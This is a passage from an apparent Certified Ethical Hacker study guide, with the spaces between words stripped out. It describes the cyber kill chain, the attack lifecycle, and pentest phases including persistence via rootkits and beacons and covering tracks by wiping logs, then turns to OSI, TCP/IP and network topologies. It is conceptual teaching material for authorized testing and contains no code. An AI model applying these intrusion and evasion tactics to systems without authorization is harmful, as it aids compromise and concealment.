ance,thatisspecifictothetarget.Theymayjustuseapieceofcommonoff-­the-­shelf(COTS)malware,thoughthishasthepotentialtobediscoveredbyantivirussoftwareinstalledinthevictim’senvironment.Theattackermaydecidethisdoesn’tmatterbysendingoutmoremalicioussoftwaretomoreindividuals.Deliveryishowyougettheweapon(themalwareorthelinktoaroguewebsite)intothevictim’senvironment.Thiscouldbeanetwork-­basedattack,meaningthereisanexposed8 Chapter1  EthicalHacking■servicethatmaybevulnerabletoexploitremotely.Thiscouldbesendinganattachmentinviaemail,oritcouldbethatthemalicioussoftwareishostedonawebserverthevictimisexpectedtovisitandgetinfectedwhentheyhitthewebsite.Exploitationiswhenthemalicioussoftwareinfectsthevictim’ssystem.Exploitationleadstoinstallation.Theattackerwillinstalladditionalsoftwaretomaintainaccesstothesystemandperhapsgivethemremoteaccesstothesystem.Onceinstallationiscomplete,theattackermovestocommandandcontrol.YouwillsometimesseethisreferredtoasC2.Thecommand-­and-­controlphasegivesattackersremoteaccesstotheinfectedsystem.Thismayinvolveinstallationofadditionalsoftware,oritmayinvolvesendingdirectivestotheinfectedsystem.Theattackermaybetryingtogetinformationfromtheinfectedsystemorhavethesystemperformactionslikeparticipatinginalarge-­scaledenial-­of-­serviceattack.Theseactionsarecalledactionsonobjectives.Eachattackermayhavedifferentobjectivestheyaretryingtoachieve.Attackerswhoarecriminallyorientedareprobablylookingforwaystomonetizetheinfectedsystemsbystealinginformationthatcouldbestolenorbysellingoffaccesstoanotherorganization.So-­callednation-­stateactorsmaybelookingtogainaccesstointellectualproperty.Nomatterwhattheorganizationis,theyhaveobjectivestheyaretryingtoachieve.Theywillkeepgoinguntiltheyachievethoseobjectives,sothereisalotofactivitythathappensinthisphaseofthekillchain.AttackLifecycleThesecuritytechnologyandconsultingcompanyFireEyeMandiantoftenreferstoadifferentmethodologycalledtheattacklifecycle.Thisisdifferentfromthecyberkillchain,thoughtherearesomesimilarities.Ratherthanatheoreticalexerciseoronewithamilitaryfocus,theattacklifecycledescribesexactlyhowattackershaveoperatedforasfarbackastherehavebeenattacksagainstcomputinginfrastructure.IfyougobackandlookathowtheChaosComputerCluboperatedinthe1980sorKevinMitnickandhiscontemporariesoperatedinthelate1970sintothe1980sandbeyond,youcanmaptheiractionsdirectlyintotheattacklifecycle.Figure 1.2showshowtheattacklifecyclelooks.FIGURE 1.2 AttacklifecycleMoveLaterallyMaintainPresenceInternalReconInitialReconInitialCompromiseEstablishFootholdEscalatePrivilegesCompleteMissionMethodologies 9Onesignificantdifferencebetweentheattacklifecycleisarecognitionthattheattackisnotoneanddone.Thereisaloopthathappensinthemiddle.Attackersdon’tkeeplaunchingattacksfromoutsidethenetwork.Oncetheygetintotheenvironment,theyusethecompromisedsystemsaslaunchpointsforadditionalcompromiseswithintheenvironment.Attackerswillgainaccesstoasystemandusethatsystemandanythingdiscoveredthere,likecredentials,tomoveofftoanothersysteminthenetwork.Beforewegetthere,though,anattackeridentifiesavictimandpotentialattackpossibilitiesintheinitialreconstage.Theattackerisdoingreconnaissance,includingidentifyingnamesandtitlesusingopensourceintelligence,meaningtheyusepublicsourceslikesocialnetworksites,togenerateattacks.Togainaccess,theylaunchattacks—­commonly,thesewouldbephishingattacks.Thisistheinitialcompromisestage.Oncetheyhavecompromisedasystem,theattackerwillworktoestablishfootholds.Thisincludesmakingsuretheyretainaccesstothesystemsotheycangetbackinwhentheyneedto.It’sperhapsimportanttorecognizethattheseattacksdon’thappeninabang-­bangfashion.Itmaytakedaysorweekstomovefromonephaseoftheattacklifecycletoanother.Thisdependsontheorganizationperformingtheattacks.Thesearenotindividuals.Theyareorganizations,sotheremaybedifferentemployeesworkingondifferentstages.Todomuchelse,theattackerwillneedtoescalateprivileges.Theyneedtohaveadministrativeprivilegestomoveintotheloopthathappensastheycontinuetomovethroughtheenvironment,gatheringadditionalsystemsalongtheway.Theywillprobablybegatheringcredentialsfrommemoryordiskhere.Theywillalsobeinvestigatingconnectionsthesystemisknowntohavehadwithothersystemsinthenetwork.Thisisaformofinternalrecon.Theymayalsobetryingtoidentifyothercredentialsthatareknowntothesystem.Thereconnaissanceisnecessarytobeabletomovelaterally.Thisissometimesknownaseast-­westmovement.Ifyouthinkaboutthenetworkdiagram,theconnectiontotheoutsideworldisquiteoftenonthetop.Onamap,thiswouldbenorth,somovingintoandoutofthenetworkisknownasnorth-­south.Anymovementwithintheorganizationissidetosideorlateralmovement.Onamap,sidetosidewouldbeeast-­west.Tomakethoselateralmovements,attackersneedtoknowwhatsystemsthereare.Itmaybeservers,sinceindividualsystemsarelikelytoknowalotofserverstheycommunicatewith,butitmayalsobeindividualworkstations.Inanenterprisenetwork,itmaybepossibletoauthenticateusingcapturedcredentialsagainstotherworkstations,whichmayhaveaccesstodifferentsetsofservers.Witheverysystemtheattackergetsaccessto,theyneedtomaintainpresence.Thismeanssomeformofpersistence,soanymalwarethatisallowingtheattackeraccessremainsrunning.YoumightusetheWindowsregistry,scheduledtasks,orothertypesofpersistencetokeepanymalwarerunningsotheattackercankeepgettingbackinwhentheywant.Thelastphaseoftheattacklifecycle,thoughleavingituntiltheendismisleading,iscompletemission.Again,attackstendnottobeoneanddone.Onceanattackerisinyourenvironment,theywilllikelybecontinuingtorevisittoseeifthereisanythingelseyouneed.Theymaybecontinuingtogetabroaderreachwithintheorganization.Thecompletemissionphaseiswheredatamaybeexfiltratedfromtheenvironment.This,again,maynot10 Chapter1  EthicalHacking■beaone­timething.Theattackermaycontinuetofindadditionaltargetsintheenvironmenttoexploit,whichwouldlikelymeanadditionalexfiltration.Thismeanstherewouldbecontinuousreturnstothisphase.Afterall,ifyouareplanningtotakeupyears-­longresidence,youdon’twanttowaityearsbeforegettingdataoutbecauseyoucan’t,asanattacker,everknowwhensomethingmaychangeandyouloseaccess.Methodologyof EthicalHackingThebasicmethodologyismeanttoreproducewhatreal-­lifeattackerswoulddo.Youwillseesimilaritiesheretoboththecyberkillchainandtheattacklifecycle.Companiescanshoreuptheirsecurityposturesusinginformationthatcomesfromeachstagecoveredhere.Onethingtokeepinmindwhenitcomestoinformationsecurityisthatnoteverythingisaboutprotectionorprevention.Youneedtobeabletodetectalloftheseattackeractivities.Reconnaissanceand FootprintingReconnaissanceiswhereyougatherinformationaboutyourtarget.Youwanttounderstandthescopeofyourendeavorupfront,ofcourse.Thiswillhelpyounarrowyouractionssoyouaren’tengaginginanythingthatcouldbeunethical.You’llhavesomesenseofwhoyourtargetis,butyoumaynothaveallthedetails.Gatheringthedetailsofyourtargetisoneofthereasonsforperformingreconnaissance.AnotherreasonisthatwhilethereisalotofinformationthathastobepublicjustbecauseofthenatureoftheInternetandtheneedtodobusinessthere,youmayfindinformationleakedtotherestoftheworldthattheorganizationyouareworkingforwoulddobettertolockdown.Theobjectiveofreconnaissanceandfootprintingisdeterminingthesizeandscopeofyourtest.Footprintingisjustgettinganideaofthe“footprint”oftheorganization,meaningthesizeandappearance.Thismeanstryingtoidentifynetworkblocks,hosts,locations,andpeople.Theinformationgatheredherewillbeusedlaterasyouprogressthroughadditionalstages.Keepinmindthatwhileyouarelookingfordetailsaboutyourtarget,youwillfindnotonlynetworkblocks,whichmayexistwithinenterprisenetworks,butalsopotentiallysinglehosts,whichmaybelongtosystemsthatarehostedwithaserviceprovider.Asthesesystemswillrunservicesthatmayprovideentrypointsorjusthousesensitivedata,it’snecessarytokeeptrackofeverythingyougatherandnotlimityourselftoinformationavailableaboutnetworkblocksthatthecompanymayhave.Intheprocessofdoingthiswork,youmayalsoturnuppersonalinformationbelongingtoemployeesatyourtarget.Thiswillbeusefulwhenitcomestosocialengineeringattacks.Thesesortsofattacksarecommonplace.Infact,someestimatessuggestthat80to90 percentofinfiltrationsarearesultofthesesocialengineeringattacks.Theyarenottheonlymeansofaccessingnetworks,buttheyarecommonlytheeasiestwayin.Methodologyof EthicalHacking 11Scanningand EnumerationOnceyouhavenetworkblocksidentified,youwillwanttoidentifysystemsthatareaccessiblewithinthosenetworkblocks;thisisthescanningandenumerationstage.Moreimportant,however,youwillwanttoidentifyservicesrunningonanyavailablehost.Ultimately,theseserviceswillbeusedasentrypoints.Theobjectiveistogainaccess,andthatmaybepossiblethroughexposednetworkservices.Thisincludesnotonlyalistofallopenports,whichwillbeusefulinformation,butalsotheidentityoftheserviceandsoftwarerunningbehindeachopenport.Thismayalsoresultingatheringinformationthatdifferentservicesprovide.Thisincludesthesoftwareprovidingtheservice,suchasnginx,Apache,orIISforawebserver.Additionally,thereareservicesthatmayprovidealotofdetailsaboutnotonlythesoftwarebuttheinternalsoftheorganization.Thismaybeusernames,forinstance.SomeSimpleMailTransferProtocol(SMTP)serverswillgiveupvalidusernamesiftheyarequeriedcorrectly.WindowsserversusingtheServerMessageBlock(SMB)protocolortheCommonInternetFileSystem(CIFS)protocolcanbeaskedforinformation.Youcangetdetailslikethedirectoriesbeingshared,usernames,andevensomepolicyinformation.Theobjectiveofthisphaseistogatherasmuchinformationasyoucantohavestartingpointsforwhenyoumoveintothenextphase.Thisphasecanbetime-­consuming,especiallyasthesizeofthenetworkandenterpriseyouareworkingwithgrows.Themoredetailsyoucangatherhere,theeasierthenextstagewillbeforyou.GainingAccessGainingaccessiswhatmanypeopleconsidertobethemostimportantpartofapenetrationtest,andformany,it’sthemostinteresting.Thisiswhereyoucandemonstratethatsomeservicesarepotentiallyvulnerable.Youdothatbyexploitingtheservice.Therearenotheoreticalorfalsepositiveswhenyouhavecompromisedasystemorstolendataandyoucanproveit.Thishighlightsoneoftheimportantaspectsofanyethicalhacking:documentation.Justsaying,“Hey,Ididthis”isn’tgoingtobesufficient.Youwillneedtodemonstrateorproveinsomewaythatyoudidmanagetocompromisethesystem.Technicalattacks,likethoselookingforvulnerabilitiesinlisteningnetworkservices,aresometimesthoughtofashowsystemsgetcompromised,buttherealityisthatsocialengineeringattacksarefarmorelikelytobethewayattackersgainaccesstosystems.Thisisoneofthereasonswhyenumerationisimportant—­becauseyouneedtargetsforsocialengineeringattacks.Thereareanumberofwaystoperformsocialengineeringattacks,includingusingemailtoeitherinfectamachinewithmalwareorgettheusertoprovideinformationthatcanbeusedinotherways.Thismaybetheusernameandpassword,forinstance.Anothermechanismforgatheringinformationfromusersistogetthemtovisitawebsite.Thismaybeawebsitethatyou,astheattacker,haveloadedwithmalicioussoftwarethatwillinfecttheirsystems.Or,asbefore,youmaybeaskingthemforinformation.You’veseenmalwarementionedtwicehere.Understandinghowmalwareworksandwhereitcanbeusedcanbeanimportantpartofgainingaccess.12 Chapter1  EthicalHacking■Youwillnotalwaysbeaskedtoperformsocialengineeringattacks.Companiesmaybehandlingsecurityawareness,whichcommonlyincludesawarenessofsocialengineeringattacks,inotherwaysandnotwantorexpectyoutodophishingattacksorweb-­basedattacks.Therefore,youshouldn’trelyonusingthesetechniques,inspiteofthecomparativeeaseofdoingso,togetaccesstosystems.MaintainingAccessOnceyouarein,emulatingcommonattackpatternsmeansthatyoushouldmaintainaccess.Ifyou’vemanagedtocompromiseauser’ssystem,whentheusershutsthesystemdown,youwillloseaccess.Thismaymeanthatyouwillneedtore­compromisethesystem.Sinceexploitsarenotalwaysguaranteedtobeeffective,youmaywellnotgetinthenexttimeyouattemptthecompromise.Beyondthat,youmayhaveusedacompromisethatreliedonavulnerabilitythatwasfixed.Yournextattemptmayfailbecausethevulnerabilityisnolongerthere.Youneedtogiveyourselfothermeanstogetintothesystemsoyoucanmakesureyouretaintheabilitytoseewhatishappeningonthatsystemandpotentiallytheenterprisenetworkoverall.Thisisanotherstagewheremalwarecanbebeneficial.Youmayneedtoinstallarootkit,forexample,thatcanprovideyouwithabackdooraswellasthemeanstoobscureyouractionsandexistenceonthesystem.Youmayneedtoinstalladditionalsoftwareonthesystemtomaintainaccess.Thismayrequirecopyingthesoftwareontoyourtargetsystemonceyouhavedonetheinitialcompromise.Therefore,thisstageisn’tassimpleasperhapsitseems.Theremaybeanumberoffactorsthatgetinthewayofensuringthatyoumaintainaccess.Thereare,though,anumberofwaysofmaintainingaccess.Differentoperatingsystemsallowfordifferenttechniques,buteachoperatingsystemversionorupdatecanmakedifferenttechniquesharder.Ethicalhackingisdependentonthecircumstances,whichispartofwhatmakesitchallenging.Therearenosingleanswersorstraightforwardapproaches.OneWindows10systemmaybeeasilycompromisedbecausetherearepatchesthatareavailablebutmissing.AnotherWindows10systemmaybedifficulttogetintobecauseitisup-­to-­date,andithasbeenlockeddownwithpermissionsandothersettings.Maintainingaccessisoftencalledpersistence.Thisiswhereanyaccessmechanismisinstalledtopersistonasystem.Nomatterwhetherauserlogsoutorrebootsasystem,theattackercancontinuetogetin.Thisiscommonlydonebyinstallingsoftwarethatreachesout,orbeacons,tosystemsontheInternetsomewhere.Thereasonforthisisbecauseinboundaccessisoftenblockedbyafirewall.Outboundaccessisoftenallowedfromtheinsideofanetworkinacompletelyunrestrictedmanner.CoveringTracksCoveringyourtracksiswhereyouhideordeleteanyevidencetowhichyoumanagedtogetaccess.Additionally,youshouldcoverupyourcontinuedaccess.Thiscanbeaccomplishedwithmalwarethatensuresthatyouractionsaren’tloggedorperhapsmisreportssysteminformation,likenetworkconnections.Summary 13Onethingtokeepinmindwhenyouaretryingtocoveryourtracksisthatsometimesyouractionsmayalsoprovideevidenceofyourwork.OneexampleisthatwipinglogsonaWindowssystemwillleavealogentryindicatingthatthelogshavebeenwiped.Thismaybeanindicationtoanyonewatchingthelogsthatsomeonetriedtoeraseevidence.It’snotaguaranteethatthelogwipewasmalicious,butitmaybeenoughtopromptsomeonetoinvestigatefurther.Becauseofthis,coveringtrackscanbechallenging.Thismay,though,beexactlywhatyou’vebeenaskedtodo—­challengeandtesttheresponsecapabilitiesoftheoperationsteam.Asaresult,it’salwaysimportanttokeepinmindtheobjectivesofyourengagement.SummaryIt’shardtooverstatetheimportanceofethics.YouwillbeexpectedtoadheretoacodeofethicswhenyousignupforyourCEHcertificationandpassyourexam.You’llneedtoactinaprofessionalmanneratalltimeswithyourclientsandemployers.Youwillneedtobearesponsiblecustodianofanydataentrustedtoyou.Chapter2NetworkingFoundationsTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Networkingtechnologies✓✓Communicationsprotocols✓✓Telecommunicationstechnologies✓✓Networktopologies✓✓SubnettingWhileitmaynotlookliketherearealotoftopicsthatarecoveredintheexaminthischapter,whatiscoveredisfoundationalformuchofwhatcomeslater.Afterall,unlessyouaresittingatthecomputeryouareattacking,whichwouldbeveryuncommon,you’regoingtobeinteractingwiththenetwork.Insomecases,thedifferentattacks,andcertainlythedefenses,willmakeuseofnetworkingtechnologiesandcommunicationsprotocols.Tounderstandhownetworksfunction,itmaybehelpfultohaveaconceptualunderstandingofhowtheprotocolsfittogether.Thereisoneconceptualmodelusedtodescribecommunicationprotocolsandtheirfunctions.Thereisanotherwayofdescribingthesefunctions,sometimescalledamodel,butit’smoreofanas-­builtarchitecturaldesign.Inthischapter,I’llcoverboththeOpenSystemsInterconnection(OSI)modelandtheTCP/IParchitecture.Youwillbeexpectedtounderstandnetworktopologies.Topologiesaregenerallyconceptualandcanbeusedasawayoflogicallyorganizingsystemstoseehowtheyareconnected.Thiswillstartusdownthepathoftalkingaboutthephysicalelementsofnetworks,includinghowtheyareaddressed.Ultimately,whenwearenetworkingsystems,wewantthemtobeabletocommunicatewithoneanother.Todothat,eachsystemneedstohaveawayforotherstoaddressit.Asyouwillsee,eachsystemwillhavemultipleaddresses.Thisrefersbacktothemodelsmentionedearlierbecausethedifferentaddressesarewaysofcommunicatingwiththedifferentfunctionsatdifferentlayers.Aswemoveupthenetworkstacksfromthephysicalcomponents,we’llstarttalkingabouttheprotocolsyouareperhapsmostfamiliarwith:InternetProtocol(IP),TransmissionControlProtocol(TCP),andUserDatagramProtocol(UDP).Thesewillbethefoundationalprotocolsyouwillneedasolidunderstandingoffornotonlytestingsystemsbutalsoprovidingguidanceastohowdifferentvulnerabilitiesmayberemediatedbycompaniesyouareworkingfor.Onecommonapproachtoprovidinginformationtechnologyservicesincompanies,especiallyiftheservicesaretoexternalusersorcustomers,istouseserviceproviders.Cloudcomputingcanbeusedasanimplementationofthistypeofoutsourcing.Makinguseoftheseserviceprovidersandworkingwithorganizationsthathaveplacedsystemsandserviceswiththemintroducessomespecificchallengestosomeoneperformingsecurityassessmentsorpenetrationtests.Thismeansthatunderstandinghowtheseexternalserviceprovidersworkcanbeessential.CommunicationsModels 17CommunicationsModelsWeaccesssystemsthroughtheiraddresses.Theproblemisthateachsystemwillhavemultipleaddresses.Theseaddressesarebestseparatedintobucketsrelatedtothefunctionalityprovidedbytheprotocoleachaddressbelongsto.Thefirstcommunicationsmodel,fromthestandpointofwhatwe’llbetalkingaboutbutalsofromthestandpointofhistory,meaningitessentiallycamefirst,ismoreconceptualthanstrictlypractical.Iwillfollowupwithapracticalmodel.Thesecommunicationsmodelsarebrokenintolayers,andthelayersarestackedontopofoneanother.Becauseitshowsupasastackoftiers,youwilloftenhearthemreferredtoasnetworkstacksorprotocolstacks.Oneimportantaspecttoconsiderwhenitcomestothesenetworkstacksisthatthelayersareallseparateandthefunctionalityisdistinct.Whentwosystemsaretalking,eachhasthesenotionallayers,andlayerConthefirstsystemcanonlytalktolayerC,notlayersB,A,orD,onthesecondsystem.ThisisbecausetheprotocolsatlayerConbothsystemsmatch.Thesameistruefortheotherprotocols.Asanexample,youcanseeasetofnetworkheadersinFigure 2.1.Thelayer/functionthatgeneratedthissetofheadersonthesendingsidecanbereadonlybythesamelayer/functiononthereceivingside.FIGURE 2.1 Networkheaders18 Chapter2  NetworkingFoundations■ProtocolsPerhapsbeforegoingtoomuchfurther,Ishoulddefinewhataprotocolis.Aprotocolisasetofrulesorconventionsthatdictatecommunication.Whenyoumeetsomeoneyouknowonthestreet,youmaynodorsayhello.Theywilllikelyreturnyourgreeting.Thisisaprotocol.Youknowwhatyoushouldsayordoandtheothersideofthecommunicationknowswhattheresponseis.Computersareessentiallythesame—­theyknowsetsofrulesandexpectedbehaviors.Withouttheseprotocols,youcouldgreetyouracquaintancebystickingyourlittlefingerintoyourear,andtheotherpersoncouldremoveashoeandthrowitatyou.Thiswouldbeaprotocolmismatch,andneitherofyouwouldhaveanyideawhattheappropriateresponseisbecausetheydon’tknowwhattheinitialcommunicationattemptmeant.Aswegothroughthetwocommunicationsmodels,I’lltalkaboutnotonlythefunctionsthatexistateachlayer,butalsotheprotocolsthatexistateachlayer.Whenwe’redone,you’llhavetwodifferent,butnotdissimilar,waysofunderstandinghowprotocolscommunicateacrosssystemsandhowmessagesbetweensystems/applicationsareputtogether.Dissectingthefunctionsofnetworkcommunicationsintolayersmeansthefunctionsaremodularized.Thismeansthatitcanbeeasytoextractoneprotocolfromthechainandinsertanotherone.ThesameapplicationsworkoverEthernet,forexample,astheonesthattraveloverSONETorFrameRelay.Alltheseprotocolsexistatthesamelayer.Thisworksbecausethefunctionalityofeachlayerisabstracted,meaninglayerscancommunicatewitheachotherwithoutneedingtoknowthedetailsbecausethefunctionalityisknown.Theindividualprotocolsdon’tmatter,necessarily.Therearemanydifferentprotocolsforeachofthelayers,nomatterwhichmodelwearetalkingabout.OpenSystemsInterconnectionPriortothelate1970s,communicationssystemsusedproprietaryprotocols,makingithardertoconceptualizewhatwashappening.Eachprotocoldefineddifferentcommunicationsindifferentways.Inthelate1970s,theInternationalOrganizationforStandardization(ISO)beganaprocesstodefineasetofstandardsforcommunication.Theideabehindthiswastoallowforbetterinteroperabilitybetweenvendors.Ifallthefunctionsarebrokenoutconceptually,theinterfacepointsareclearerand,assuch,easiertointeractwith.In1978,aninitialmodelwasannounced.Afterrefinements,itwaspublishedastheOSImodel.Whiletherewereconcernsaboutthecomplexityofthismodelandthechancethatitwasunlikelytobeimplemented,itremainsasolidmodeltohelprefertoboundariesbetweenfunctionswithinanetworkstack.TheOSImodelincludessevenlayers.Whenindicatingaparticularfunctionality,networkprofessionalsmaymakereferencetothefunctionbythelayernumber.We’llseehowthisworksshortly.CommunicationsModels 19FIGURE 2.2 ThesevenlayersoftheOSImodelApplicationPresentationSessionTransportNetworkDataLinkPhysicalFigure 2.2showsthesevenlayersoftheOSImodel.Intalkingaboutthemodel,wetypicallystartatthegroundfloorandworkourwayuptothepenthouse.Atthebottomofthemodeliswhereyouconnecttothenetwork.Atthetopiswhereyouinteractwiththe user.SincewebuildmessagesfromtheApplicationlayerdown,we’regoingtostartdiscussingeachofthelayersandtheirrolesthereandmovedownward.Forwhatit’sworth,though,thevariousmnemonicsthatareoftenusedtohelppeoplerememberthedifferentlayersstartatthebottom.Forexample,oneofmystudentsoncesuggested“PleaseDoNotTouchSteve’sPetAlligator”tohelpremembertheorder.That’sbottomtotop,though.Regardless,ifyouremembereitherorderandthencanrememberwhateachofthelayersdoes,you’llbeingoodshape.Application(Layer7)  TheApplicationlayeristheoneclosesttotheenduser.Thisdoesnotmeanthatitistheapplicationitself,however.Wearetalkingaboutprotocols.Applicationlayerprotocolsmanagethecommunicationneedsoftheapplication.Theymayidentifyresourcesandmanageinteractingwiththoseresources.Asanexample,theHypertextTransferProtocol(HTTP)isanApplicationlayerprotocol.Ittakescareofnegotiatingforresources(pages,etc.)betweentheclientandtheserver.Presentation(Layer6)  ThePresentationlayerisresponsibleforpreparingdatafortheApplicationlayer.Itmakessurethatthedatathatishandeduptotheapplicationisintherightformatsoitcanbeconsumed.Whensystemsarecommunicating,theremaybedisconnectsinformattingbetweenthetwoendpoints,andthePresentationlayermakessurethatdataisformattedcorrectly.Assuch,characterencodingformatsliketheAmericanStandardCodeforInformationInterchange(ASCII),Unicode,andthe20 Chapter2  NetworkingFoundations■ExtendedBinaryCodedDecimalInterchangeCode(EBCDIC)allbelongatthePresentationlayer.Additionally,theJointPhotographicExpertsGroup(JPEG)formatisconsideredtobeatthePresentationlayer.Session(Layer5)  TheSessionlayermanagesthecommunicationbetweentheendpointswhenitcomestomaintainingthecommunicationoftheapplications(theclientorserver).Remoteprocedurecalls(RPCs)areanexampleofafunctionattheSessionlayer.TherearecomponentsoffilesharingthatalsoliveattheSessionlayer,sincenegotiationofcommunicationbetweentheendpointsneedstotakeplace.TheApplicationlayertakescareofmanagingtheresourceswhiletheSessionlayertakescareofmakingsurethatfiles,asanexample,aresuccessfullytransmittedandcomplete.Transport(Layer4)  TheTransportlayertakescareofsegmentingmessagesfortransmission.TheTransportlayeralsotakescareofmultiplexingofthecommunication.BoththeTCPandtheUDParetransportprotocols.Theseprotocolsuseportsforaddressing,soreceivingsystemsknowwhichapplicationtopassthetrafficto.Network(Layer3)  TheNetworklayergetsmessagesfromoneendpointtoanother.Itdoesthisbytakingcareofaddressingandrouting.TheIPisoneprotocolthatexistsatthislayer.DataLink(Layer2)  Oneotheraddresstocontendwithisthemediaaccesscontrol(MAC)address.Thisisalayer2address,identifyingthenetworkinterfaceonthenetworksocommunicationscangetfromonesystemtoanotheronthelocalnetwork.TheAddressResolutionProtocol(ARP),virtuallocalareanetworks(VLANs),Ethernet,andFrameRelayareDataLinklayerprotocols.Theytakecareofformattingthedatatobesentoutonthetransmissionmedium.Physical(Layer1)  Thislayerprobablyspeaksforitself.Thisisalltheprotocolsthatmanagethephysicalcommunications.10BaseT,10Base2,100BaseTX,and1000BaseTareallexamplesofPhysicallayerprotocols.Theydictatehowthepulsesonthewirearehandled.OneoftheproblemswiththeOSImodelisthattherearenotalwaysgoodfitswhenitcomestomappingprotocolstothesevenlayers.TheproblemoftencomesintheareasbetweentheSessionandApplicationlayers.Asanexample,atwhichlayerdoestheSecureShell(SSH)protocollive?IsittheSessionlayerbecauseitultimatelymanagessessions,orisitthePresentationlayerbecauseitincludesencryptionmechanismsandnegotiatesthem?Otherprotocolsseemtoexistbetweenlayers.ARP,forinstance,issaidtooperateattheDataLinklayer,butitneedstoknowabouttheNetworklayerbecauseitprovidesthebridgebetweentheaddressinginthosetwolayers.However,thereareplaceswherehavingthemodelmakesconceptualizingthingsmucheasier.Forexample,youprobablyhaveadeviceinyourhomethat’sveryconfusing.Youmaycallitarouter,oryoumayknowpeoplewhocallitarouter.Theproblemisthatroutingisalayer3function,asdiscussedearlier,andthereareotherfunctionsinthedevicethatarestrictlylayer2,meaningyouhaveswitchportsthattransmitmessagesonyourlocalnetworkCommunicationsModels 21wherethereisnoroutinginvolved.Additionally,it’sentirelypossibleyourdeviceisn’tevendoinganyrouting,butinsteaditmaybebridgingtoyourprovider’snetwork.Italldependsonhowyourdeviceisworkingandwhatyourproviderisexpectingfromyourdevice.Thisiswhereunderstandingthedifferentlayersishelpful.Youcanbetteridentifywhereyoumayhaveproblemsbecauseyoucanisolatefunctionality.TCP/IPArchitectureInthelate1960s,theARPAnetwasfirstdevelopedandimplemented.Overthenextfewyears,itgrewfarbeyondtheinitialtwoandthenthreenodesthatwereconnectedin1968–69.Asmoresystemswereconnectedtothenetwork,thepeopleresponsibleformanagingthenetworkanddevelopingtheprotocolsusedtoexchangeinformationlearnedalot.Theinitialprotocolwasthe1822protocolthatdefinedcommunicationstotheInterfaceMessageProcessor(IMP),whichwasalargecomputerwithspecializedinterfacesactingasamessagegateway(thinkofitasaveryprimitiverouter).The1822protocolwaslaterreplacedbytheNetworkControlProgram(NCP).By1983,aftermanyyearsofdevelopment,theNCPwasreplacedentirelybyasuiteofprotocolsnowcommonlycalledTransmissionControlProtocol(TCP)/InternetProtocol(IP).ThewaythesuiteofprotocolsusedwithinTCP/IPstackisdescribedisslightlydifferentfromthewaytheOSImodelisdescribed.AfterTCP/IPwasimplemented,theconceptualdesignoftheprotocolswasdescribed.Forthisreason,thesuiteissometimesreferredtoasamodel,butitmayalsobereferredtoasanarchitecture,sinceit’sadescriptionofanas-­builtdesignratherthansomethingconceptual.OSIisentirelyconceptualsinceitdidn’tdescribeanythinginparticular.TheTCP/IParchitectureisamuchsimplerdesignthantheOSImodel,whichisanimmediatedifferenceandareflectionoftheas-­builtnatureofthedesignascomparedwiththeconceptualdesignoftheOSI.SincetheOSImodelhadtobeabstractandflexibletoaccommodateawidevarietyofprotocolsanddesigns,itwasbrokenoutintothesevenfunctionalcategoriesdescribedearlier.TCP/IP,ontheotherhand,asanas-­builtdefinition,isonlyfourlayers.ThisisnottosaythatthereisnocorrelationbetweentheOSImodelandtheTCP/IParchitecture.AsyoucanseeinFigure 2.3,thereismuchthatissimilarbetweenthetwo.FIGURE 2.3 TheTCP/IParchitecturelayersApplicationTransportInternetLink22 Chapter2  NetworkingFoundations■You’llnoticethesimilarities.Forastart,thereisanApplicationlayerinboth.ThereisalsoaTransportlayer.TheInternetandNetworklayersarenamedverysimilarly.EssentiallywhathappensisthattheSession,Presentation,andApplicationlayersfromtheOSImodelarecollapsedintotheApplicationlayerintheTCP/IPmodel.Additionally,thePhysicalandDataLinklayersfromtheOSImodelarecollapsedintotheLinklayerintheTCP/IPmodel.ThesamefunctionsfromthecollapsedlayersexistintheTCP/IPmodel.Conceptually,though,it’seasiertounderstand.Anythingrelatedtotheapplicationcommunication,includinganysessionmanagementanddataformatting,isintheApplicationlayer.Similarly,intheTCP/IPmodel,thePhysicallayerandtheDataLinklayerareputtogether.Regardlessofwhichmodelyouprefertothinkaboutnetworkingin,you’llfindthatprotocolsdon’tgenerallysprawlacrossmultiplelayers.Theyaredesignedtofilltherequirementsofaspecificfunction,whichwilllandprettysquarelyintooneofthelayersofeachmodel.Intherestofthechapter,andfairlycommonlyintherealworldinmyexperience,whenyouseeareferencetolayers,thereferenceistotheOSImodelandnottheTCP/IParchitecture.TopologiesThewaynetworksaredesignedalsousesconceptualmodels,asawayoftakingaratmazeofphysicalnetworksandmappingthemtoalogicalrepresentation.Thisisnotonlyaboutgettingalogicalmapofthenetworkbutalsohelpstoidentifyhoweverythingisconnectedsinceitwillhelptoisolatepotentialissues.Differenttopologiesintroducedifferentpotentialproblems.You’llalsotypicallyfindthatsometopologiesareonlyfoundincertainsituations.Somewillbefoundinserviceprovidernetworks,whileothersaremorecommonlyfoundinlocalareanetworks.BusNetworkAbusnetwork,asshowninFigure 2.4,consistsofasinglenetworkcabletowhicheverydeviceonthenetworkconnects.Abusisacommunicationchannel.Youmayfindabusinsideyourcomputertocommunicatebetweenchannels.Inourcase,it’sacommunicationchannel(asinglenetworkcable)thatallowsthecommunicationbetweenmultiplecomputers.ThewaysomebusnetworksworkisbyusingacoaxialcablewithT-­connectors.TheT-­connectorprovidesawaytoextractthesignalfromthebusinordertoprovideconnectivitytothesystemsonthenetwork.Thistypeofbusnetworkrequiressomethingontheendofthecabletokeepthesignalonthewire.Theseelectricaldevicesarecalledterminators.Youcanseetheblocksontheendofthebus.Theykeepthesignalfromreflectingbackontothewire,causingcancellationofthesignal.Topologies 23FIGURE 2.4 BusnetworkWhatyouwillnoticewiththebusnetworkisthatthereisnomediatingdevice.Allofthecomputersareconnecteddirectlytooneanotherbymeansofthatsinglenetworkcable.StarNetworkWhenyouseeadiagramofastarnetwork,itwilloftenlooksimilartothebusnetwork.Thedifferencebetweenthebusandthestarnetwork,however,isthatthereisamediatingdevicebetweenallthedevices.Thismaybeahub,ifyouhaveaveryoldnetwork,whichisadumbelectricalrepeater,oryoumayhaveaswitch.YoucanseeatraditionaldiagraminFigure 2.5.Inthecaseofthisdiagram,thecentrallineyousee,whichlookslikeabus,isreallyaswitchorahub.Thesedeviceswillthensendthesignalsthatcomeinbackouttotheotherdevices.Inthecaseofahub,everydeviceonthenetworkwillgetit.Ifyournetworkusesaswitch,thesignalwillbesenttothecorrectport.FIGURE 2.5 Starnetwork24 Chapter2  